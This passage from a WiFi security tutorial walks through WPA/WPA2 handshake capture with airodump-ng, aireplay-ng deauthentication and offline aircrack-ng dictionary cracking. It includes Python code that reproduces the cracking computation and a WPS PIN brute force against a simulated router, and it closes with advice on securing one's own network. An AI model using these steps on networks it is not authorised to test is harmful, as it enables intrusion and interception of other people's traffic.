
3.Wireless modes:

When you want to attack a WPA/WPA2 network you first need to capture the “handshake”. The handshake is the 4-way exchange of EAPOL frames between a client (for example a laptop) and the access point every time the client connects; it carries the nonces and a MIC derived from the network key, but not the key itself. Once you have it you no longer need to be in WiFi range: the password can be attacked offline with only the handshake file and the WiFi name (the ESSID, which is used as the salt when the key is derived; you will learn this later). To capture it you need to see all the packets exchanged between the router and the computers on the network. That raises the question “if the MAC address is used to ensure that each packet gets delivered to the right place, then how can we capture it?”. The answer is “yes and no”: the MAC address is used to send frames to the right destination, and normally we only receive frames sent to our own MAC address, but that only applies to the default mode of a wireless card, which is “managed” mode. There is another mode that makes the card pass up every 802.11 frame it hears on its channel, not only the ones addressed to our device, hence the name “monitor” mode. So, now you know the basics and are ready to actually capture a handshake. First change your MAC address and put the card into monitor mode (on Kali this is done with macchanger and airmon-ng) by typing the commands shown in the photo:



As you can see in the image, when I checked wlan0 afterwards its mode was Monitor. You are now ready to capture a handshake; once you have it, cracking the network comes down to the handshake and a word list.

4.Catching handshake:

Handshake packets are exchanged every time a client associates with the target AP, so to capture one we capture every packet on the AP's channel. In this section we are going to use a program called “airodump-ng”, which sniffs and records the packets sent over the network. It is preinstalled on Kali as part of the aircrack-ng suite. There are two steps to catching a handshake.

1.Start airodump-ng on the target AP (Access Point):

The syntax is:
>airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
Ex: >airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write out wlan0mon
The interface is the monitor-mode interface created in the previous step. Locking airodump-ng to the AP's channel matters: the card can only listen on one channel at a time, and the handshake is only usable if its messages are all captured on that channel. The capture is written to out-01.cap (the number increases on every run with the same file name).

2.Wait for a client to connect to the access point, or deauthenticate a connected client (if any) so that its system reconnects automatically and performs a new handshake.

The syntax is:
>aireplay-ng --deauth [number of deauth packets] -a [AP] -c [target] [interface]
Ex: >aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 -c 00:AA:11:22:33 wlan0mon

Run this in a second terminal while airodump-ng keeps running on the same channel and the same monitor interface; [target] is the MAC address of the connected client. A handful of deauth frames is normally enough; 1000 just keeps the client off the network for longer. The attack only works if at least one client is connected, and it fails against clients and APs that enforce Protected Management Frames (802.11w), which authenticate deauthentication frames.

If the handshake is captured, airodump-ng tells you by printing “WPA handshake: [bssid]” in the top right corner of its output. Follow these steps, and when you catch the handshake your screen should look like this:



Once you have the handshake you are ready to crack the password.

5.Cracking the WPA/WPA2 key:

Now that you have the handshake you need a word list; the bigger and better it is, the better your chance of recovering the password (Kali already ships one, rockyou.txt, under /usr/share/wordlists). You can download larger ones from the following links:



When you have downloaded one of them you are ready to attack the network. We are going to use aircrack-ng to crack the key. It works offline: for each password in the word list it computes the Pairwise Master Key (PMK) with PBKDF2 (HMAC-SHA1, 4096 iterations) from the password and the access point name (ESSID), expands the PMK into the Pairwise Transient Key (PTK) using the two MAC addresses and the two nonces found in the handshake, and uses the PTK to recompute the MIC of one of the handshake messages; if it matches the MIC in the captured file, that password is the key. The syntax is:

>aircrack-ng -w [wordlist] [handshake filename]

Ex: >aircrack-ng -w list out-01.cap
aircrack-ng does not take an interface: it only reads the capture file, so this step can run on any machine, without the wireless card. If the capture contains several networks, add -b [bssid] to select the target. Run it and wait for aircrack-ng to finish. When the password is found the screen should look like this:



Congratulations! You have cracked a WPA-secured wireless network. Now it is time to secure our own wireless network, because as you have seen it is simple to do, and whoever does it can join the network and capture and analyse the packets sent over it. Anything that is not separately encrypted (plain HTTP logins, for instance) is readable, so a weak WiFi password can leak your mail password, your social network password, card details and so on. It is very dangerous not to have a secure wireless network.
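To make the description of what aircrack-ng does with the handshake concrete, here is an added example (written for this page, not part of the original post or of the aircrack-ng code) that performs the same computation in Python: PBKDF2 from passphrase and ESSID to PMK, the 802.11i PRF-512 from PMK, MAC addresses and nonces to PTK, and the HMAC-SHA1 MIC check on an EAPOL-Key message 2. The MAC addresses and nonces are made up, and the handshake is constructed by the script itself; only the ESSID “IEEE” with passphrase “password” is real, being the PSK test vector from the IEEE 802.11 standard.

```python
"""What aircrack-ng does with a captured WPA2 handshake, written out in Python."""
import hashlib
import hmac

# Field positions inside an EAPOL-Key frame: EAPOL header (4) + descriptor type (1)
# + key info (2) + key length (2) + replay counter (8) + nonce (32) + IV (16)
# + RSC (8) + key ID (8), then the 16-byte MIC.
EAPOL_NONCE = slice(17, 49)
EAPOL_MIC = slice(81, 97)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 256 bits).
    The ESSID is the salt, which is why the network name is needed with the
    handshake, and the 4096 iterations are what make each wordlist entry cost."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce) -> bytes:
    """PTK from the PMK plus the two MAC addresses and two nonces seen in the handshake."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC of an EAPOL-Key frame for key descriptor version 2 (WPA2/CCMP):
    HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol[:EAPOL_MIC.start] + bytes(16) + eapol[EAPOL_MIC.stop:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with no Key Data; a real
    capture carries an RSN IE there, which enters the MIC in exactly the same way."""
    body = (b"\x02"           # descriptor type: RSN
            + b"\x01\x0a"     # key info: version 2, pairwise, MIC bit set
            + b"\x00\x10"     # key length (16 for CCMP)
            + bytes(8)        # replay counter
            + snonce
            + bytes(16) + bytes(8) + bytes(8)   # key IV, RSC, key ID
            + mic
            + b"\x00\x00")    # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type Key


def crack(ssid, ap_mac, client_mac, anonce, msg2, wordlist):
    """Try each candidate passphrase against the captured handshake, like aircrack-ng -w."""
    captured_mic = msg2[EAPOL_MIC]
    snonce = msg2[EAPOL_NONCE]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, client_mac,
                         anonce, snonce)[:16]          # KCK = first 128 bits of the PTK
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


# Constructed sample handshake: hypothetical MACs and nonces; ESSID "IEEE" with
# passphrase "password" is the PSK test vector from the 802.11 standard.
SSID = "IEEE"
AP_MAC = bytes.fromhex("112233445566")
CLIENT_MAC = bytes.fromhex("00aa11223344")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def constructed_handshake(passphrase: str = "password") -> bytes:
    """Message 2 as the client would send it when the network key is `passphrase`."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC,
                     ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, eapol_mic(kck, build_msg2(SNONCE)))


if __name__ == "__main__":
    msg2 = constructed_handshake()
    print(crack(SSID, AP_MAC, CLIENT_MAC, ANONCE, msg2, ["letmein", "qwerty", "password"]))
```

Everything the attacker needs (both MAC addresses, ANonce from message 1, SNonce and the MIC from message 2, and the ESSID from the beacon) is in the capture, which is why the attack is entirely offline and why only the wordlist decides whether it succeeds.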

6.Securing Your Network From The Above Attacks:

Now that we know how to test the security of all the common wireless encryption schemes (WEP/WPA/WPA2), it is relatively easy to secure our networks against these attacks, because we know the weaknesses hackers use to crack them.

So let's look at each of them one by one:

1. WEP: WEP is an old encryption scheme and it is really weak. As we saw in the course, there are several methods that crack it regardless of the strength of the password, even if nobody is connected to the network. These attacks are possible because of the way WEP works; we discussed its weaknesses and how they are used to recover the key, and some of these methods recover it in a few minutes.

2. WPA/WPA2: WPA and WPA2 are very similar; the main difference is the cipher used to encrypt traffic (TKIP for WPA, AES-CCMP for WPA2), but both use the same 4-way handshake, so the same attacks apply. WPA/WPA2 can be cracked in two ways:

(a) If the WPS feature is enabled there is a high chance of obtaining the key regardless of its complexity, by exploiting a weakness in WPS. WPS lets users connect to their wireless network without typing the key, either by pressing a WPS button on the router and the device, or by entering an eight-digit PIN. The PIN is the problem: the router checks it in two halves (the first four digits, then the remaining digits, of which the last is a checksum), so an attacker needs at most about 11,000 guesses instead of 100 million and can brute-force it in a relatively short time (on average around 10 hours). Once a tool such as reaver has the right PIN, the router hands over the actual WPA/WPA2 key as part of the WPS exchange. So this is not a weakness in WPA/WPA2 itself but in a feature that can be enabled on routers that use WPA/WPA2, and it can be exploited to get the real key.

(b) If WPS is not enabled, the only way to crack WPA/WPA2 is a dictionary attack: a list of passwords is tried against the handshake file, as in the previous section, to check whether any of them is the actual key. The check is offline, so the attacker can try as many candidates as they like, but if the password is not in the word list they will not find it.
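Point (a) above claims the WPS PIN falls to brute force because it is verified in two halves. The following added example (written for this page; it is not reaver's code and talks to no real router) shows why: it implements the WPS PIN checksum as specified, a constructed stand-in for the registrar that leaks which half was wrong the way a real one does through its M4/M6 NACKs, and a half-by-half search that counts its attempts. The secret PIN 12345670 is a made-up test value.

```python
"""Why an 8-digit WPS PIN falls to brute force: the registrar confirms the two
halves of the PIN separately, so the search space is 10^4 + 10^3, not 10^8."""


def wps_checksum(first7: int) -> int:
    """Checksum digit appended to the first seven digits of a WPS PIN
    (the algorithm from the WPS specification, weights 3,1,3,1,... from the right)."""
    accum, pin = 0, first7
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin8: int) -> bool:
    """True when the 8th digit is the checksum of the first seven."""
    return wps_checksum(pin8 // 10) == pin8 % 10


def make_registrar(secret_pin: str):
    """Constructed stand-in for the access point's WPS registrar. A real registrar
    answers M4 with a NACK when the first half (PSK1) is wrong and M6 with a NACK
    when the second half (PSK2) is wrong; that is exactly what this oracle leaks."""
    def attempt(pin: str) -> str:
        if pin[:4] != secret_pin[:4]:
            return "nack_m4"   # first half wrong, second half never examined
        if pin[4:] != secret_pin[4:]:
            return "nack_m6"   # first half right, second half wrong
        return "ok"            # full PIN accepted; M7 would now carry the WPA key
    return attempt


def brute_force_pin(attempt):
    """Recover the PIN the way reaver does: fix the first half, then the second.
    Returns (pin, number of attempts); worst case 10000 + 1000 = 11000 attempts."""
    tries = 0
    for a in range(10000):
        first = f"{a:04d}"
        tries += 1
        if attempt(first + "0000") != "nack_m4":   # anything but an M4 NACK means half 1 is right
            break
    else:
        return None, tries
    for b in range(1000):
        # Only 3 free digits remain: the 8th is the checksum, so invalid PINs are skipped.
        second = f"{b:03d}" + str(wps_checksum(int(first + f"{b:03d}")))
        tries += 1
        if attempt(first + second) == "ok":
            return first + second, tries
    return None, tries


if __name__ == "__main__":
    pin, n = brute_force_pin(make_registrar("12345670"))
    print(f"PIN {pin} recovered after {n} attempts (worst case 11000, naive 10^8)")
```

The 10-hour figure in the text comes from the router's response time per attempt and from lock-out behaviour, not from the size of the search; the search itself is tiny, which is why the only real fix is to disable WPS.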


Conclusion:

1. Do not use WEP encryption; we have seen how easy it is to crack regardless of the complexity of the password, even if nobody is connected to the network.

2. Use WPA2 with a long, complex password that is not a dictionary word or phrase; make sure it contains lower-case letters, capital letters, symbols and numbers; and

3. Ensure that the WPS feature is disabled, as it can be used to recover your complex WPA2 key by brute-forcing the easy WPS PIN.
